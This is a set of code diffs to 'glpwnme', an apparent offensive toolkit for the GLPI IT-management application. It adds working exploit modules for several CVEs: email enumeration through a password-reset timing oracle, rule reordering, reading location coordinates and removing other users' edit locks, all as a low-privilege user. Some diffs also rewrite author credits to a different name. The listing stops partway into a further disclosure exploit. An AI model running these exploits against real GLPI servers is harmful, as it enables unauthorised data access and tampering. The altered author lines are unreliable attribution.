+            Log.msg(f"[gold3]Email likely does NOT exist[/] (target was faster than canary - unusual)")
         else:
-            Log.msg(f"[grey66]Inconclusive[/] — delta {delta:.2f}s is below threshold {self._THRESHOLD}s")
+            Log.msg(f"[grey66]Inconclusive[/] - delta {delta:.2f}s is below threshold {self._THRESHOLD}s")
             Log.msg("Try: increasing --samples, checking if SMTP is configured, or the instance may be patched")

--- a/glpwnme/exploits/implementations/cve_2024_43416.py
+++ b/glpwnme/exploits/implementations/cve_2024_43416.py
@@ -86,18 +86,13 @@ class CVE_2024_43416(GlpiExploit):
         Log.log(f"  {email!r}: times={[f'{t:.2f}' for t in times]}, avg={avg:.2f}s")
         return avg
 
-    def _csrf(self, html):
-        import re
-        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', html or "")
-        return m.group(1) if m else ""
-
-    def _timed_invalid_post(self, token):
+    def _timed_invalid_post(self):
         """POST the lost-password form with a random INVALID email; return elapsed seconds."""
         import uuid
         email = f"glpwnme_nope_{uuid.uuid4().hex[:10]}@nope.invalid"
         t0 = time.time()
         try:
-            self.post(self._LOSTPASS_URL, data={"_glpi_csrf_token": token, "email": email, "change_passwd": "1"}, allow_redirects=False, timeout=30)
+            self.post(self._LOSTPASS_URL, data={"email": email, "change_passwd": "1"}, allow_redirects=False, timeout=30)
         except Exception:
             pass
         return time.time() - t0
@@ -129,11 +124,9 @@ class CVE_2024_43416(GlpiExploit):
                     "timing oracle untrustworthy")
             return False
 
-        token = self._csrf(resp.text)
         samples = []
         for _ in range(4):
-            samples.append(self._timed_invalid_post(token))
-            token = self._csrf(self.get(self._LOSTPASS_URL).text) or token
+            samples.append(self._timed_invalid_post())
         med = statistics.median(samples)
 
         if med < 0.6:

--- a/glpwnme/exploits/implementations/cve_2025_53105.py
+++ b/glpwnme/exploits/implementations/cve_2025_53105.py
@@ -20,7 +20,7 @@ class CVE_2025_53105(GlpiExploit):
 
     Fix in 10.0.19: added $rules->canUpdate() check before executing the move.
 
-    @author unclej4ck
+    @author cconard96
     @cvss 4.3
     @name CVE_2025_53105
     """
@@ -104,7 +104,7 @@ class CVE_2025_53105(GlpiExploit):
                 return False
             if r.status_code == HTTPStatus.OK:
                 Log.msg("Low-privilege user reached RuleCollection move_rule without the rule/config "
-                        "right → rule-reordering BOLA (CVE-2025-53105)")
+                        "right -> rule-reordering BOLA (CVE-2025-53105)")
                 return True
             Log.log(f"Unexpected move_rule response (HTTP {r.status_code})")
             return False

--- a/glpwnme/exploits/implementations/cve_2025_53105.py
+++ b/glpwnme/exploits/implementations/cve_2025_53105.py
@@ -1,0 +1,133 @@
+import re
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2025_53105(GlpiExploit):
+    """
+    Broken Object Level Authorization (BOLA) on GLPI rule ordering —
+    any authenticated user can reorder business rules (GLPI < 10.0.19).
+
+    ajax/rule.php case 'move_rule' only calls Session::checkLoginUser()
+    (verifies the session exists) but NOT canUpdate() on the rule collection.
+    Any user, including Self-Service, can therefore reorder any rule set
+    (RuleAsset, RuleImportAsset, RuleMailCollector, etc.).
+
+    Attack path:
+        POST /ajax/rule.php
+        action=move_rule&id=<rule_id>&type=<RuleType>&condition=up
+
+    Fix in 10.0.19: added $rules->canUpdate() check before executing the move.
+
+    @author unclej4ck
+    @cvss 4.3
+    @name CVE_2025_53105
+    """
+    _impacts = "Broken Object Level Authorization, Rule Order Manipulation"
+    _privilege = "User"
+    _is_check_opsec_safe = True
+    min_version = "9.1.0"
+    max_version = "10.0.19"
+
+    _AJAX = "/ajax/rule.php"
+    _RULE_FRONT = "/front/rule.php"
+
+    _RULE_TYPES = [
+        "RuleAsset",
+        "RuleImportAsset",
+        "RuleMailCollector",
+        "RuleSoftwareCategory",
+    ]
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "BOLA — any authenticated user can reorder GLPI business rules\n"
+        infos += "(GLPI 9.1.0 – 10.0.18). [b]ajax/rule.php[/b] [i]move_rule[/i] only checks\n"
+        infos += "[b]Session::checkLoginUser()[/b] (session exists), not [i]canUpdate()[/i].\n"
+        infos += "A Self-Service user can reorder RuleAsset, RuleImportAsset, etc.\n"
+        infos += "Fix in 10.0.19: [i]$rules->canUpdate()[/i] check added before the move.\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]rule_type (default 'RuleAsset')[/i]: Rule collection type to target\n"
+        infos += " - [i]rule_id (default auto-detect)[/i]: Rule ID to move\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Confirm BOLA (checks if move_rule succeeds without admin rights)[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Demonstrate rule reorder on a specific rule type[/]\n"
+        infos += "--run -O rule_type=RuleImportAsset\n"
+
+        infos += "\nExploit is [green b]Safe[/] (moves rule up then immediately back down)"
+        return infos
+
+    def _get_rule_ids(self, rule_type):
+        """Fetch the first few rule IDs for a given rule type."""
+        resp = self.get(self._RULE_FRONT, params={"sub_type": rule_type}, allow_redirects=True)
+        return [int(m) for m in re.findall(r'rule\.form\.php\?id=(\d+)', resp.text)]
+
+    def _move_rule(self, rule_id, rule_type, direction="up"):
+        resp = self.post(self._AJAX, data={
+                "action": "move_rule",
+                "id": str(rule_id),
+                "type": rule_type,
+                "condition": direction,
+            }, allow_redirects=True)
+        return resp
+
+    def check(self):
+        """A LOW-PRIVILEGE user (Self-Service, no rule/config right) calls move_rule.
+        Pre-10.0.19 ajax/rule.php only checks Session::checkLoginUser(), not canUpdate() on
+        the rule collection, so the request is accepted (HTTP 200). 10.0.19 adds a canUpdate()
+        gate that returns 403 "Not allowed". A no-op move (rule_id=0, ref_id=0) makes the
+        200-vs-403 split come purely from the authorization gate without disturbing rankings.
+        Testing as admin passes on BOTH builds (admin holds config), so a spawned low-priv
+        user is required for a clean differential."""
+        import re
+        from ..lowpriv import spawn_lowpriv
+        lp, cleanup = spawn_lowpriv(self.glpi_session, profile_id="1")
+        if lp is None:
+            Log.log("Could not spawn a low-privilege probe user (need an admin session)")
+            return False
+        try:
+            m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"',
+                          lp.get("/front/central.php", allow_redirects=True).text)
+            tok = m.group(1) if m else ""
+            r = lp.sess.post(lp.r("/ajax/rule.php"),
+                data={"action": "move_rule", "collection_classname": "RuleTicketCollection",
+                      "rule_id": "0", "ref_id": "0", "sort_action": "after", "_glpi_csrf_token": tok},
+                headers={"X-Glpi-Csrf-Token": tok, "X-Requested-With": "XMLHttpRequest"},
+                verify=False, allow_redirects=False)
+            if r.status_code == HTTPStatus.FORBIDDEN or "not allowed" in r.text.lower():
+                Log.log("move_rule denied (canUpdate gate present) — patched (10.0.19+)")
+                return False
+            if r.status_code == HTTPStatus.OK:
+                Log.msg("Low-privilege user reached RuleCollection move_rule without the rule/config "
+                        "right → rule-reordering BOLA (CVE-2025-53105)")
+                return True
+            Log.log(f"Unexpected move_rule response (HTTP {r.status_code})")
+            return False
+        finally:
+            cleanup()
+
+    def run(self, rule_type="RuleAsset", rule_id=None):
+        ids = self._get_rule_ids(rule_type)
+        if not ids:
+            Log.err(f"No {rule_type} rules found on this instance")
+            return
+
+        rid = int(rule_id) if rule_id else ids[0]
+        Log.msg(f"Moving {rule_type} rule id={rid} up (then restoring) ...")
+
+        up_resp = self._move_rule(rid, rule_type, "up")
+        Log.msg(f"Move up: HTTP {up_resp.status_code}")
+        if up_resp.text.strip():
+            Log.log(f"Response: {up_resp.text[:200]}")
+
+        down_resp = self._move_rule(rid, rule_type, "down")
+        Log.msg(f"Move down (restore): HTTP {down_resp.status_code}")
+
+        if up_resp.status_code in (HTTPStatus.OK, HTTPStatus.FOUND):
+            Log.msg(f"Rule {rid} reordered and restored — BOLA present")
+        else:
+            Log.err("Move rejected — instance may be patched")

--- a/glpwnme/exploits/implementations/cve_2025_53105.py
+++ b/glpwnme/exploits/implementations/cve_2025_53105.py
@@ -6,7 +6,7 @@ from glpwnme.exploits.logger import Log
 
 class CVE_2025_53105(GlpiExploit):
     """
-    Broken Object Level Authorization (BOLA) on GLPI rule ordering —
+    Broken Object Level Authorization (BOLA) on GLPI rule ordering:
     any authenticated user can reorder business rules (GLPI < 10.0.19).
 
     ajax/rule.php case 'move_rule' only calls Session::checkLoginUser()
@@ -16,7 +16,7 @@ class CVE_2025_53105(GlpiExploit):
 
     Attack path:
         POST /ajax/rule.php
-        action=move_rule&id=<rule_id>&type=<RuleType>&condition=up
+        action=move_rule&collection_classname=<RuleXCollection>&rule_id=<id>&ref_id=<id>&sort_action=after
 
     Fix in 10.0.19: added $rules->canUpdate() check before executing the move.
 
@@ -42,8 +42,8 @@ class CVE_2025_53105(GlpiExploit):
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
-        infos += "BOLA — any authenticated user can reorder GLPI business rules\n"
-        infos += "(GLPI 9.1.0 – 10.0.18). [b]ajax/rule.php[/b] [i]move_rule[/i] only checks\n"
+        infos += "BOLA - any authenticated user can reorder GLPI business rules\n"
+        infos += "(GLPI 9.1.0 - 10.0.18). [b]ajax/rule.php[/b] [i]move_rule[/i] only checks\n"
         infos += "[b]Session::checkLoginUser()[/b] (session exists), not [i]canUpdate()[/i].\n"
         infos += "A Self-Service user can reorder RuleAsset, RuleImportAsset, etc.\n"
         infos += "Fix in 10.0.19: [i]$rules->canUpdate()[/i] check added before the move.\n"
@@ -66,12 +66,13 @@ class CVE_2025_53105(GlpiExploit):
         resp = self.get(self._RULE_FRONT, params={"sub_type": rule_type}, allow_redirects=True)
         return [int(m) for m in re.findall(r'rule\.form\.php\?id=(\d+)', resp.text)]
 
-    def _move_rule(self, rule_id, rule_type, direction="up"):
+    def _move_rule(self, collection, rule_id, ref_id, sort_action="after"):
         resp = self.post(self._AJAX, data={
                 "action": "move_rule",
-                "id": str(rule_id),
-                "type": rule_type,
-                "condition": direction,
+                "collection_classname": collection,
+                "rule_id": str(rule_id),
+                "ref_id": str(ref_id),
+                "sort_action": sort_action,
             }, allow_redirects=True)
         return resp
 
@@ -99,7 +100,7 @@ class CVE_2025_53105(GlpiExploit):
                 headers={"X-Glpi-Csrf-Token": tok, "X-Requested-With": "XMLHttpRequest"},
                 verify=False, allow_redirects=False)
             if r.status_code == HTTPStatus.FORBIDDEN or "not allowed" in r.text.lower():
-                Log.log("move_rule denied (canUpdate gate present) — patched (10.0.19+)")
+                Log.log("move_rule denied (canUpdate gate present) - patched (10.0.19+)")
                 return False
             if r.status_code == HTTPStatus.OK:
                 Log.msg("Low-privilege user reached RuleCollection move_rule without the rule/config "
@@ -112,22 +113,20 @@ class CVE_2025_53105(GlpiExploit):
 
     def run(self, rule_type="RuleAsset", rule_id=None):
         ids = self._get_rule_ids(rule_type)
-        if not ids:
-            Log.err(f"No {rule_type} rules found on this instance")
+        if len(ids) < 2:
+            Log.err(f"Need at least two {rule_type} rules to demonstrate a reorder")
             return
 
+        collection = rule_type + "Collection"
         rid = int(rule_id) if rule_id else ids[0]
-        Log.msg(f"Moving {rule_type} rule id={rid} up (then restoring) ...")
+        ref = next((i for i in ids if i != rid), ids[0])
+        Log.msg(f"Moving {rule_type} id={rid} after id={ref} via {collection} (no rule/config right) ...")
 
-        up_resp = self._move_rule(rid, rule_type, "up")
-        Log.msg(f"Move up: HTTP {up_resp.status_code}")
-        if up_resp.text.strip():
-            Log.log(f"Response: {up_resp.text[:200]}")
-
-        down_resp = self._move_rule(rid, rule_type, "down")
-        Log.msg(f"Move down (restore): HTTP {down_resp.status_code}")
-
-        if up_resp.status_code in (HTTPStatus.OK, HTTPStatus.FOUND):
-            Log.msg(f"Rule {rid} reordered and restored — BOLA present")
+        resp = self._move_rule(collection, rid, ref, "after")
+        Log.msg(f"move_rule: HTTP {resp.status_code}")
+        if resp.text.strip():
+            Log.log(f"Response: {resp.text[:200]}")
+        if resp.status_code in (HTTPStatus.OK, HTTPStatus.FOUND):
+            Log.msg(f"Rule {rid} reordered without the rule/config right -> BOLA (CVE-2025-53105)")
         else:
-            Log.err("Move rejected — instance may be patched")
+            Log.err("Move rejected - instance may be patched")

--- a/glpwnme/exploits/implementations/cve_2025_53111.py
+++ b/glpwnme/exploits/implementations/cve_2025_53111.py
@@ -49,20 +49,15 @@ class CVE_2025_53111(GlpiExploit):
     _LOC_FORM = "/front/location.form.php"
     _LOC_LIST = "/front/location.php"
 
-    def _fcsrf(self, session, path):
-        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', session.get(path).text)
-        return m.group(1) if m else ""
-
     def _meta_csrf(self, session, path="/front/central.php"):
         m = re.search(r'(?:name|property)="glpi:csrf_token"\s+content="([^"]+)"', session.get(path).text)
         return m.group(1) if m else ""
 
     def _seed_location(self):
         name = "glpwnme_secret_loc_" + uuid.uuid4().hex[:8]
-        tok = self._fcsrf(self.glpi_session, self._LOC_FORM)
         self.post(self._LOC_FORM, data={
             "add": "1", "name": name, "latitude": "48.85837", "longitude": "2.29448",
-            "entities_id": "0", "_glpi_csrf_token": tok}, allow_redirects=False)
+            "entities_id": "0"}, allow_redirects=False)
         lst = self.get(self._LOC_LIST, allow_redirects=True).text
         m = re.search(r"location\.form\.php\?id=(\d+)[^>]*>\s*" + re.escape(name), lst)
         if m:
@@ -71,10 +66,8 @@ class CVE_2025_53111(GlpiExploit):
         return (max(ids, key=int) if ids else None), name
 
     def _purge_location(self, locid):
-        c = self._fcsrf(self.glpi_session, f"{self._LOC_FORM}?id={locid}")
-        if c:
-            self.post(self._LOC_FORM, data={"id": locid, "purge": "purge", "_glpi_csrf_token": c},
-                      allow_redirects=False)
+        self.post(self._LOC_FORM, data={"id": locid, "purge": "purge"},
+                  allow_redirects=False)
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
@@ -121,9 +114,7 @@ class CVE_2025_53111(GlpiExploit):
 
     def run(self, itemtype="Location", items_id="1"):
         """Read an arbitrary mappable item's name + coordinates as the current user."""
-        csrf = self._meta_csrf(self.glpi_session)
-        r = self.post(self._ENDPOINT, data={"itemtype": itemtype, "items_id": items_id}, headers={"X-Glpi-Csrf-Token": csrf,
-                                                 "X-Requested-With": "XMLHttpRequest"}, allow_redirects=False)
+        r = self.post(self._ENDPOINT, data={"itemtype": itemtype, "items_id": items_id}, allow_redirects=False)
         if r.status_code == HTTPStatus.OK and '"success":false' not in r.text:
             Log.msg(f"{itemtype} {items_id}: [green b]{r.text}[/green b]")
         else:

--- a/glpwnme/exploits/implementations/cve_2025_53111.py
+++ b/glpwnme/exploits/implementations/cve_2025_53111.py
@@ -1,0 +1,130 @@
+import re
+import uuid
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+from ..lowpriv import spawn_lowpriv
+
+
+class CVE_2025_53111(GlpiExploit):
+    """
+    Information disclosure to non-authorized users via the map-point AJAX
+    endpoint (GLPI >= 0.80, < 10.0.19).
+
+    ajax/getMapPoint.php resolved an itemtype/items_id and returned the item's
+    name plus latitude/longitude after only Session::checkLoginUser(), with NO
+    per-item READ check:
+
+        // 10.0.18 (vulnerable)
+        $item = getItemForItemtype($_POST['itemtype']);
+        $item->getFromDB($_POST['items_id']);
+        echo json_encode(['name' => ..., 'lat' => ..., 'lng' => ...]);
+
+    Any authenticated user (Self-Service, no Location/Dropdown right) can read
+    the name and GPS coordinates of any Location (or other mappable item) they
+    are not allowed to view.
+
+    Fix (10.0.19): a per-item authorization gate is added before disclosure:
+
+        if (!$item->can($items_id, READ)) {
+            echo json_encode(['success' => false, 'message' => __('Not allowed')]);
+            return;
+        }
+
+    This is the cleanest reproducible member of the 10.0.19 access-control
+    cluster (the same fix added per-item READ guards to ajax/cable.php,
+    ticketiteminformation.php, impact.php, timeline.php, uemailUpdate.php).
+
+    @author unclej4ck
+    @cvss 6.5
+    @name CVE_2025_53111
+    """
+    _impacts = "Information Disclosure, Broken Access Control"
+    _privilege = "User"
+    _is_check_opsec_safe = True
+    min_version = "0.80"
+    max_version = "10.0.19"
+
+    _ENDPOINT = "/ajax/getMapPoint.php"
+    _LOC_FORM = "/front/location.form.php"
+    _LOC_LIST = "/front/location.php"
+
+    def _fcsrf(self, session, path):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', session.get(path).text)
+        return m.group(1) if m else ""
+
+    def _meta_csrf(self, session, path="/front/central.php"):
+        m = re.search(r'(?:name|property)="glpi:csrf_token"\s+content="([^"]+)"', session.get(path).text)
+        return m.group(1) if m else ""
+
+    def _seed_location(self):
+        name = "glpwnme_secret_loc_" + uuid.uuid4().hex[:8]
+        tok = self._fcsrf(self.glpi_session, self._LOC_FORM)
+        self.post(self._LOC_FORM, data={
+            "add": "1", "name": name, "latitude": "48.85837", "longitude": "2.29448",
+            "entities_id": "0", "_glpi_csrf_token": tok}, allow_redirects=False)
+        lst = self.get(self._LOC_LIST, allow_redirects=True).text
+        m = re.search(r"location\.form\.php\?id=(\d+)[^>]*>\s*" + re.escape(name), lst)
+        if m:
+            return m.group(1), name
+        ids = re.findall(r"location\.form\.php\?id=(\d+)", lst)
+        return (max(ids, key=int) if ids else None), name
+
+    def _purge_location(self, locid):
+        c = self._fcsrf(self.glpi_session, f"{self._LOC_FORM}?id={locid}")
+        if c:
+            self.post(self._LOC_FORM, data={"id": locid, "purge": "purge", "_glpi_csrf_token": c},
+                      allow_redirects=False)
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Broken access control in [b]ajax/getMapPoint.php[/b] (GLPI <= 10.0.18).\n"
+        infos += "The endpoint returned an item's name and GPS coordinates after only a\n"
+        infos += "login check, with no per-item READ gate. A Self-Service user reads the\n"
+        infos += "name/latitude/longitude of any Location they cannot view.\n"
+        infos += "Fix 10.0.19: adds [i]$item->can($items_id, READ)[/i] before disclosure.\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Differential check (seeds a Location, reads it as a low-priv probe)[/]\n--check\n"
+
+        infos += "\nExploit is [green b]Safe[/] (seeds and purges its own Location + probe)."
+        return infos
+
+    def check(self):
+        """Seed a Location (admin), then a spawned Self-Service probe (no Location right)
+        requests its coordinates via getMapPoint. Vulnerable: the probe receives the
+        seeded location's name + coordinates. Patched: the endpoint returns
+        {"success":false,"message":"Not allowed"}."""
+        locid, name = self._seed_location()
+        if not locid:
+            Log.log("Could not seed a Location to test against (need an admin session)")
+            return False
+        lp, cleanup = spawn_lowpriv(self.glpi_session, profile_id="1")
+        try:
+            if lp is None:
+                Log.log("Could not spawn a Self-Service probe (need an admin session)")
+                return False
+            csrf = self._meta_csrf(lp)
+            r = lp.sess.post(lp.r(self._ENDPOINT), data={"itemtype": "Location", "items_id": locid},
+                             headers={"X-Glpi-Csrf-Token": csrf, "X-Requested-With": "XMLHttpRequest"},
+                             verify=False, allow_redirects=False)
+            if r.status_code == HTTPStatus.OK and name in r.text:
+                Log.msg(f"Self-Service probe read the name + GPS coordinates of Location {locid} "
+                        f"(no Location READ right) via getMapPoint → broken access control "
+                        f"(CVE-2025-53111)")
+                return True
+            Log.log("getMapPoint denied the probe (per-item READ gate present) — patched (10.0.19+)")
+            return False
+        finally:
+            self._purge_location(locid)
+            cleanup()
+
+    def run(self, itemtype="Location", items_id="1"):
+        """Read an arbitrary mappable item's name + coordinates as the current user."""
+        csrf = self._meta_csrf(self.glpi_session)
+        r = self.post(self._ENDPOINT, data={"itemtype": itemtype, "items_id": items_id}, headers={"X-Glpi-Csrf-Token": csrf,
+                                                 "X-Requested-With": "XMLHttpRequest"}, allow_redirects=False)
+        if r.status_code == HTTPStatus.OK and '"success":false' not in r.text:
+            Log.msg(f"{itemtype} {items_id}: [green b]{r.text}[/green b]")
+        else:
+            Log.err(f"Denied or empty (patched?) — HTTP {r.status_code}: {r.text[:80]}")

--- a/glpwnme/exploits/implementations/cve_2025_53111.py
+++ b/glpwnme/exploits/implementations/cve_2025_53111.py
@@ -35,7 +35,7 @@ class CVE_2025_53111(GlpiExploit):
     cluster (the same fix added per-item READ guards to ajax/cable.php,
     ticketiteminformation.php, impact.php, timeline.php, uemailUpdate.php).
 
-    @author unclej4ck
+    @author cconard96
     @cvss 6.5
     @name CVE_2025_53111
     """
@@ -110,10 +110,10 @@ class CVE_2025_53111(GlpiExploit):
                              verify=False, allow_redirects=False)
             if r.status_code == HTTPStatus.OK and name in r.text:
                 Log.msg(f"Self-Service probe read the name + GPS coordinates of Location {locid} "
-                        f"(no Location READ right) via getMapPoint → broken access control "
+                        f"(no Location READ right) via getMapPoint -> broken access control "
                         f"(CVE-2025-53111)")
                 return True
-            Log.log("getMapPoint denied the probe (per-item READ gate present) — patched (10.0.19+)")
+            Log.log("getMapPoint denied the probe (per-item READ gate present) - patched (10.0.19+)")
             return False
         finally:
             self._purge_location(locid)
@@ -127,4 +127,4 @@ class CVE_2025_53111(GlpiExploit):
         if r.status_code == HTTPStatus.OK and '"success":false' not in r.text:
             Log.msg(f"{itemtype} {items_id}: [green b]{r.text}[/green b]")
         else:
-            Log.err(f"Denied or empty (patched?) — HTTP {r.status_code}: {r.text[:80]}")
+            Log.err(f"Denied or empty (patched?) - HTTP {r.status_code}: {r.text[:80]}")

--- a/glpwnme/exploits/implementations/cve_2025_53112.py
+++ b/glpwnme/exploits/implementations/cve_2025_53112.py
@@ -34,7 +34,7 @@ class CVE_2025_53112(GlpiExploit):
     (HTTP 400 'Not allowed'). So the check confirms the missing authorization
     without removing any real lock.
 
-    @author unclej4ck
+    @author cconard96
     @cvss 4.3
     @name CVE_2025_53112
     """
@@ -81,11 +81,11 @@ class CVE_2025_53112(GlpiExploit):
                              verify=False, allow_redirects=False)
             if r.status_code == HTTPStatus.OK and "not allowed" not in r.text.lower():
                 Log.msg("Self-Service probe reached the ungated unlockobject delete path "
-                        "(no PURGE authorization) → broken access control / unauthorized "
+                        "(no PURGE authorization) -> broken access control / unauthorized "
                         "lock removal (CVE-2025-53112)")
                 return True
             if r.status_code == HTTPStatus.BAD_REQUEST or "not allowed" in r.text.lower():
-                Log.log("unlockobject rejected the probe (can(PURGE) gate present) — patched (10.0.19+)")
+                Log.log("unlockobject rejected the probe (can(PURGE) gate present) - patched (10.0.19+)")
                 return False
             Log.log(f"Unexpected unlockobject response (HTTP {r.status_code})")
             return False
@@ -103,4 +103,4 @@ class CVE_2025_53112(GlpiExploit):
         if r.status_code == HTTPStatus.OK and r.text.strip() == "1":
             Log.msg(f"[green b]Lock {id} removed[/]")
         else:
-            Log.err(f"Lock not removed (absent or patched) — HTTP {r.status_code}: {r.text[:60]}")
+            Log.err(f"Lock not removed (absent or patched) - HTTP {r.status_code}: {r.text[:60]}")

--- a/glpwnme/exploits/implementations/cve_2025_53112.py
+++ b/glpwnme/exploits/implementations/cve_2025_53112.py
@@ -1,0 +1,106 @@
+import re
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+from ..lowpriv import spawn_lowpriv
+
+
+class CVE_2025_53112(GlpiExploit):
+    """
+    Unauthorized resource removal by an under-privileged user via the object-lock
+    unlock endpoint (GLPI >= 9.1.0, < 10.0.19).
+
+    ajax/unlockobject.php handled the 'unlock' action with no authorization beyond
+    Session::checkLoginUser():
+
+        // 10.0.18 (vulnerable)
+        if (isset($_POST['unlock'])) {
+            if ($ol->getFromDB($_POST["id"]) && $ol->deleteFromDB(1)) { echo 1; }
+            else { echo 0; }
+        }
+
+    Any authenticated user (Self-Service) can purge any glpi_objectlocks row by id,
+    removing the pessimistic edit-lock another user holds and defeating
+    concurrent-edit protection (CWE-862).
+
+    Fix (10.0.19): a per-object PURGE check is added before the delete:
+
+        $ol = new ObjectLock();
+        if (!$ol->can($_POST["id"], PURGE)) { Response::sendError(400, 'Not allowed'); }
+
+    Differential (non-mutating): a request for a NON-EXISTENT lock id reaches the
+    ungated delete path on a vulnerable build (HTTP 200, body '0', nothing deleted)
+    but is rejected by the new guard before any DB lookup on a patched build
+    (HTTP 400 'Not allowed'). So the check confirms the missing authorization
+    without removing any real lock.
+
+    @author unclej4ck
+    @cvss 4.3
+    @name CVE_2025_53112
+    """
+    _impacts = "Broken Access Control, Unauthorized Resource Removal"
+    _privilege = "User"
+    _is_check_opsec_safe = True
+    min_version = "9.1.0"
+    max_version = "10.0.19"
+
+    _ENDPOINT = "/ajax/unlockobject.php"
+    _NONEXISTENT = "888888"
+
+    def _meta_csrf(self, session, path="/front/central.php"):
+        m = re.search(r'(?:name|property)="glpi:csrf_token"\s+content="([^"]+)"', session.get(path).text)
+        return m.group(1) if m else ""
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Broken access control in [b]ajax/unlockobject.php[/b] (GLPI <= 10.0.18).\n"
+        infos += "The [i]unlock[/i] action deleted any [b]glpi_objectlocks[/b] row by id with\n"
+        infos += "no authorization, so a Self-Service user could strip the edit-lock another\n"
+        infos += "user holds. Fix 10.0.19: adds [i]$ol->can($id, PURGE)[/i] before the delete.\n"
+        infos += "Check is non-mutating: it probes a non-existent lock id and reads the\n"
+        infos += "ungated-path (200) vs guarded (400) differential.\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Differential check (no lock is removed)[/]\n--check\n"
+
+        infos += "\nExploit is [green b]Safe[/] (probes a non-existent id; no mutation)."
+        return infos
+
+    def check(self):
+        """A spawned Self-Service probe POSTs unlock for a non-existent lock id. On a
+        vulnerable build the ungated delete path is reached (HTTP 200, body '0'); on the
+        patched build the new can(PURGE) gate rejects it first (HTTP 400 'Not allowed')."""
+        lp, cleanup = spawn_lowpriv(self.glpi_session, profile_id="1")
+        try:
+            if lp is None:
+                Log.log("Could not spawn a Self-Service probe (need an admin session)")
+                return False
+            csrf = self._meta_csrf(lp)
+            r = lp.sess.post(lp.r(self._ENDPOINT), data={"unlock": "1", "id": self._NONEXISTENT},
+                             headers={"X-Glpi-Csrf-Token": csrf, "X-Requested-With": "XMLHttpRequest"},
+                             verify=False, allow_redirects=False)
+            if r.status_code == HTTPStatus.OK and "not allowed" not in r.text.lower():
+                Log.msg("Self-Service probe reached the ungated unlockobject delete path "
+                        "(no PURGE authorization) → broken access control / unauthorized "
+                        "lock removal (CVE-2025-53112)")
+                return True
+            if r.status_code == HTTPStatus.BAD_REQUEST or "not allowed" in r.text.lower():
+                Log.log("unlockobject rejected the probe (can(PURGE) gate present) — patched (10.0.19+)")
+                return False
+            Log.log(f"Unexpected unlockobject response (HTTP {r.status_code})")
+            return False
+        finally:
+            cleanup()
+
+    def run(self, id=None):
+        """Remove (purge) the object-lock with the given id as the current user."""
+        if not id:
+            Log.err("id is required: --run -O id=<glpi_objectlocks id>")
+            return
+        csrf = self._meta_csrf(self.glpi_session)
+        r = self.post(self._ENDPOINT, data={"unlock": "1", "id": str(id)}, headers={"X-Glpi-Csrf-Token": csrf,
+                                                 "X-Requested-With": "XMLHttpRequest"}, allow_redirects=False)
+        if r.status_code == HTTPStatus.OK and r.text.strip() == "1":
+            Log.msg(f"[green b]Lock {id} removed[/]")
+        else:
+            Log.err(f"Lock not removed (absent or patched) — HTTP {r.status_code}: {r.text[:60]}")

--- a/glpwnme/exploits/implementations/cve_2025_53112.py
+++ b/glpwnme/exploits/implementations/cve_2025_53112.py
@@ -97,9 +97,7 @@ class CVE_2025_53112(GlpiExploit):
         if not id:
             Log.err("id is required: --run -O id=<glpi_objectlocks id>")
             return
-        csrf = self._meta_csrf(self.glpi_session)
-        r = self.post(self._ENDPOINT, data={"unlock": "1", "id": str(id)}, headers={"X-Glpi-Csrf-Token": csrf,
-                                                 "X-Requested-With": "XMLHttpRequest"}, allow_redirects=False)
+        r = self.post(self._ENDPOINT, data={"unlock": "1", "id": str(id)}, allow_redirects=False)
         if r.status_code == HTTPStatus.OK and r.text.strip() == "1":
             Log.msg(f"[green b]Lock {id} removed[/]")
         else:

--- a/glpwnme/exploits/implementations/cve_2025_53113.py
+++ b/glpwnme/exploits/implementations/cve_2025_53113.py
@@ -1,0 +1,193 @@
+import re
+import uuid
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+from glpwnme.exploits.utils import GlpiSession, GlpiCredentials
+
+
+class CVE_2025_53113(GlpiExploit):
+    """
+    Item information disclosure via external links (GLPI >= 0.65, < 10.0.19).
+
+    front/link.send.php gated only on the GLOBAL `link` READ right, then fetched
+    ANY item by itemtype/id and ran Link::generateLinkContents(), substituting
+    that item's field values ([NAME], [ID], [SERIAL], [FIELD:<col>], [IP], ...)
+    into the link filename and file content it returns:
+
+        // 10.0.18 (vulnerable)
+        Session::checkRight("link", READ);
+        if ($item = getItemForItemtype($_GET["itemtype"])) {
+            if ($item->getFromDB($_GET["id"])) {            // no per-item READ check
+                $content_filename = Link::generateLinkContents($link, $item, false);
+                $content_data     = Link::generateLinkContents($file, $item, false);
+                ... echo the substituted bytes ...
+
+    A user holding the `link` READ right but WITHOUT READ on the target itemtype
+    (e.g. a links-only role with no Computer access) can read field values of any
+    item by requesting a placeholder-bearing Link against that item.
+
+    Fix (10.0.19): front/link.send.php adds
+        if (!$item->can($_GET['id'], READ)) { throw new RuntimeException('Not allowed'); }
+    before fetching, so the substitution only runs for items the caller may read.
+
+    @author unclej4ck
+    @cvss 2.7
+    @name CVE_2025_53113
+    """
+    _impacts = "Information Disclosure, Broken Access Control"
+    _privilege = "User"
+    _is_check_opsec_safe = False  # provisions a profile/user/computer/link, cleaned up after
+    min_version = "0.65"
+    max_version = "10.0.19"
+
+    _SEND = "/front/link.send.php"
+    _USER_PW = "Glpwnme_Lk_9173!"
+
+    def __init__(self, glpi_session):
+        super().__init__(glpi_session)
+        self._tag = uuid.uuid4().hex[:8]
